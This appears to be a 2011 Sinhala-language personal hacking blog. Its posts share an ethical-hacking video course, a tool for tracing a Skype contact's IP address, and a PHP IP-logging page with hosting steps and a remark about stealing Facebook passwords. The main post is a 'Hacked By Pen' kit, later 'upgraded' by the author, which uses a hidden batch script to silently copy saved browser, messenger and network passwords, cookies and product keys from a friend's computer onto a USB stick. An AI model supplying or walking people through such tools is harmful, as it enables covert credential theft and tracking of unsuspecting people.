Adlink

Wednesday, May 11, 2011

Ethical Hacking ඕනිද









යාලුවනේ මම අද ඔයාලට දෙන්න යන්නේ VTC [Vertual Traning Company ]එකෙන් හදපු Etical Hacking Video Tute set එකක්.මේකෙ videos 82 ක් තියෙනවා.ගොඩක් අය ලග ඇති මේ tute set එක .මේ tute set එකෙන් discussකරන Topics ටික මම පහලින් දාන්නම්.
01.Introduction
02.Ethical Hacking & Penetration Testing
03.Methodology Overview
04.Reconnaissance (Footprinting)
05.Scanning
06.Port & Service Enumeration
07.Data Enumeration
08.Vulnerability Assessment
09.Penetration Access Compromise Pt.1
10.Penetration Access Compromise Pt.2
11.Evading Defenses & Erasing Tracks
12.Introduction to Hacking Techniques Pt.1
13.Introduction to Hacking Techniques Pt.2
14.Popular Tools
15.Penetration Test Demo
16.Credits
මේවා ගැන තමා මෙහිදි discuss කරන්නෙ.මේ වා තමා ප්‍රදාන මාතෘකා විදිහට තියෙන්නෙ තව උප මාතෘකාත් එක්ක video lesson 82 ක් තියෙනවා.කැමති අය download කරගන්න.මම torrnt එක දාන්නම්
කැමති ලින්ක් එකකින් download කරගන්න.




Link1
















Hack IP Using Skype











කොහොමද යාලුවනේ කලින් මම දාපු Ip Finder එකක් හදන හැටි ගැන පොස්ට් එක බලන්න .ඈති කියලා හිතනවා.මම අද දෙන්න යන්නේ එලකිරිස් සොෆ්ට්වෙයා කැල්ලක්.මේකෙන් පුලුවන් skype chat එකක ඉන්න ගමන් chat කරන අනිත් කෙනාගේ ip එක trace කරගන්න.cmd open කරන් දගලන්න ඕනි නැ.7 වල නම් Task manager එකෙන් බලාගන්න පුලුවන් ඒ උනාට .‍xp වලටනම් බලා ගන්න ගොඩක් අමාරුයි.
ඒ උනාට මේ සොෆ්ට්වෙයාර් කැල්ලෙන් පුලුවන් ලේසියෙන්ම ip එක හොයාගන්න .මාත් අමාරුවෙන් තමාහොයා ගත්තේ.
හරි අපි බලමු කොහොමද මේක කරන්නේ කියලා.

  1. මුලින්ම මේ සොෆ්ට් වෙයාර් එක install කරගන්න.
  2. avast එකේ නම් install කරන්න හදනකොට අහනවා sandboxi run කරන්නද කියලා එහෙම කරලා නම් හොදයි මේක ටෙස්ට් කරන්න ඒ උනාට close  කරාම සොෆ්ට්වෙයාර් එකත් නැ.ඒක නිසා sand boxi නැතුව install කරාට කිසි අවුලක් නැ.
  3. ඊට පස්සේ කාව හරි skype chat එකකට Set කරගන්න.
  4. chat කරන ගමන් යාලුවාට skype call එකක් ගන්න.ඒ අතරතුර ඔයාලා අපි install කරගත්ත.software එක open කරගන්න.
  5. දැන් 




ඊට පස්සේ data speed එකදිහා බලන්න.වැඩියෙන්ම data transfer වෙන ip එක තමා ඔයාලත් එක්ක chat කරන යාලුවා ගේ ip එක . හෙහෙ 
ip එක දන්නවා නම් ඉතින් ගොඩක් ජාති කරන්න පුලුවන්.
එහෙනම් ජයවේවා කිවා ඔයාලා හැමෝටම !
පුලුවන් නම් commnt එකක් දාලා යන්න.
මම පහලින් software එක download කරගන්න ලින්ක් එක දාන්නම්.
pass word: moulderfiles










download link 1

Tuesday, May 10, 2011

IP FINDER අපිම හදමු







හෙ හෙ අද කියල දෙන්න යන්නේ IP FINDER එකක් අපිම හදන විදිහ.හරි ලේසි මුලින්ම කියන්න ඕනි මට php බැ මම මේක ගත්තෙ indian blog එකකින් කියලා .:D හරි දැන් අපි වැඩේට බහිමු.බය වෙන්න එපා හරි ලේසි.ආහ් තව දෙයක් කියන්න ඕනි බය වෙන්න දෙයක් නැ මේක ඇතුලෙ hide කරපු code නැ හොදේ. මුලින්ම කරන්න තියෙන්නෙ desktop එකේ right click කරලා new ගිහින් Text Document එකක් හදාගන්න.ඊට් පස්සේ ඒක Rename කරන්න ip.php කියලා.හරි දැන් ඒ ෆයිල් එක open කරලා පහල තියෙන code එක copy කරලා past කරන්න.



<?php
$ip = $_SERVER['REMOTE_ADDR'];
$dt = date("l dS \of F Y h:i:s A");
$file=fopen("ip_log.txt","a");
$data = $ip.' '.$dt."\n";
fwrite($file, $data);
fclose($file);
header( 'Location: http://www.google.com' ) ;
?>

 දැන් හරි ඊට පස්සෙ තව text file එකක් හදා ගෙන ඒක rename කරන්න ip_log.txt
දැන් වැඩේ හරි.දැන් අපි මේ php code එක run කරන්න. free hosting දෙන සයිට් එකක හොස්ට් එකක් හදා ගන්න ඕනි සයිට් ගොඩක් තිබ්බත් 
http://freezoka.net සයිට් එක ගොඩක් හොදයි.hosting account එකක් හදා ගන්න හැටි මම screen shot ගත්ත ටික මම බ්ලොග් එකට upload කරන්නැ මොකද ඒක මට වගේම dial up connection භාවිතා කරන අයට වෙන කරදරයක් මොකද screen shots වැඩිපුර දාපුවාම page එක load වෙන්න වෙලා යනවා ඒක නිසා මම screen shot ටික වෙනම upload කරන්නම් download කරගන්න. ඒකෙ තියෙනවා ඔක්කොම කරගන්න විදිහ.
මේ free hosting site එකේ user name,pass word කොහෙහරි ලියලා තියාගන්න.මේකෙන් ගොඩක් ජාති කරන්න පුලුවන්.fb pass word උස්සන ඒවා වගේ ඒවා.
ඔයාලට  හිතෙන ඒවා comment එකක් විදිහට දාලා යනව නම් මම කැමති.
එහෙනම් කට්ටියටම ජය වේවා !
අහ් මතක ඇතුව  file එක download කරගන්න.ඔන්න file හදන්න කැමති නැති අයට මම ip.php එකයි ip_log.txt දාලාම දෙන්නම්කො.


free hosting site එකට මෙතනින් යන්නhttp://freezoka.net/
****ෆයිල් එක වැඩිය ලොකු නැ 480kb පොඩි file එකක්
screen shot ටික මෙතනින් ගන්න මම ලින්ක් දෙකක් දාන්නම් කැමති එකකින් download කරගන්න.



Link



Monday, May 9, 2011

Hacked By Pen Upgraded



ඔන්න මම ඊයේ දැම්ම Hacked By Pen බලන්න ඇති කියලා හිතනවා.කට්ටියට බයක් තිබ්බා මේකෙන් අපේ password උස්සනවා ඇති කියලා.මාත් ඉතින් මේක කැලි ගලවලා බැලුවා.කිසි අවුලක් නැ.මේකෙන් අපි උස්සන password උස්සන්නෙ නැ එක නිසා බය නැතුව පාවිචි කරන්න පුලුවන්.මම ඒවගෙ දැකපු අඩුපාඩුවක් තමා firefox පාස් වර්ඩ් උස්සන්න බැරි එක.තව මට උවමනා නැති ගොඩක් ජාති එකේ තිබ්බා. ඉතින් මම ඒක මට ඕනි විදිහට upgrade කරා . දැන් තියෙන features


  1. ඉස්සර ෆයර් ෆොක්ස් පාස් වර්ඩ් catch උනේ නැ.දැන් fire fox ඔක්කොම version වල තියෙන පාස් වර්ඩ් catch වෙනවා.ඊට අමතරව Chrome,Opera,Internet Explora ect..... තව browser වල තියෙන පාස් වර්ඩ් catch වෙනවා.ඔක්කොම browser වල තියෙන පාස්වර්ඩ් බලන්න ඕනි නම් IMNEOWORD කියන එකේ ඇති sameerapassword .html කියන එක click කරන්න.

  2. instant massenger password කියන එකෙන්gmail,yahoo පාස් වර්ඩ් බලන්න පුලුවන්.



අනිත් එවත් ක්ලික් කරලා බලන්න මම ඔක්කොම ටයිප් කරන්න කම්මැලි දැන්. ඔයාල කරල බලන්න.මේක කරන්නෙත් කලින් පෝස්ට් එකෙ තිබ්බ විදිහටම තමා.කලින් පෝස්ට් එක බලන්න යන්න. මම පහලින් upgrade කරපු version එක දාන්නම් කැමති කට්ටිය බාගන්න. කට්ටිය ඔක්කොටම සුබ දවසක් එහෙනම් මේ ලින්ක් එක භාවිතා කරන්න. මෙතනින් download කරගන්න පුලුවන්




Saturday, May 7, 2011

Hacked By Pen







ඔන්න යාලුවනේ අද මම දෙන්න යන්නේ ෆට්ට භාණ්ඩයක්.හැක් ටුල් එකක් කිසි ගින්නක් නැ computer එකේ තියෙන ඔක්කොම user name pass word ඔක්කොම අදිනවා.(torjan spy ware free)

මේකෙන් අදින සෙට් එක තමා මේ දාලා තියෙන්න.



  1. Visited Link List

  2. Internet Explora Cache List

  3. Internet Explora Password List

  4. Instance Massengers Account List

  5. Installed Windows Update List

  6. Mozilla cache List

  7. cookie list

  8. Mozilla History List

  9. Search Queary List

  10. Adapter Report

  11. Network Password Report

  12. TCP/UDP Port List

  13. Product Key List

  14. Protected Storage Password List

  15. PST password List

  16. Startup Programme List

  17. Video Cache List



හිතන්න එපා මම හදපු එකක් කියලා මේක මමත් ගත්තේ indian blog එකකින්.හරි ලේසි pen එක යාලුවාගේ computer එකට ගහලා තත් 8ක් විතර තියන්න විතරයි .තියෙන්නෙ.ඔක්කොම ටික පෙන් එකේ.

හරි අපි බලමු මේක කොහොමද කරන්නේ කියලා.



  1. මුලින්ම මෙතනින් ඕනි කරන ෆයිල් එක download කරගන්න.win rar වලින් තියෙන්නෙ එක නිසා right click කරලා extract කරලා ගන්න.

  2. එකෙ ඇතුලේ ඇති copy කියලා folder එකක් එකේ තියෙන ෆයිල් ටික කොපි කරලා පෙන් එකට දාගන්න .

  3. ඊට පස්සේ hide.bat කියලා තියෙන එක ක්ලික් කරලා රන් කරන්න .ඉට පස්සෙ පෙන් එකෙන් hide.bat file එක delete කරලා දාන්න.

  4. දැන් වැඩේ හරි.

  5. දැන් ගිහින් පෙන් එක ඕනි කරන computer එකට ගහලා. ඔයාට ඔනි වැඩක් කරගෙන.පස්සේ ඔයාගෙ machine එකට ගහන්න.

  6. දැන් චුටි වැඩක් කරන්න තියෙනවා. අපි කලින් extract කර ගත්ත folder එකේ ඇති  showh.bat කියලා ෆයිල් එකක්. එක දැන් ආයෙම කොපි කරලා පෙන් එකට පේස්ට් කරන්න.ඊට පස්සෙ run කරන්න.ඊට පස්සෙ refresh කරන්න.දැන් hide උන files පෙනෙයි.


දැන් copy  කියන folder එකේ ඇතුලේ  ඇති IMNEOWORLD කියලා folder එකක් එකේ තියෙනවා ඕනිකරන ඔක්කොම html file විදිහට. ක්ලික් කරලා බලාගන්න විතරයි තියෙන්නේ.

එහෙනම් අපි ගියා කස්ටියටම ජය වේවා!




පාස්වර්ඩ් ඉවත් කර mideafire එකට අප්ලෝඩ් කරා ඔයාලට පහසුවෙන්න.




Monday, May 2, 2011

වැඩි කතා ඕනි නැ

ඔන්න වැඩි කතා ඕනි නැ.මම දෙවෙනි පාරටත් minute workers එකෙන් cash out කරා.මේ තියෙන්නෙ මම මීට කලින් ඒ ගැන ලියපු පොස්ට් එක  මෙතනින් බලන්න.  ඔයාලත් කරලා බලන්න.
මෙන්න payment proof  එක.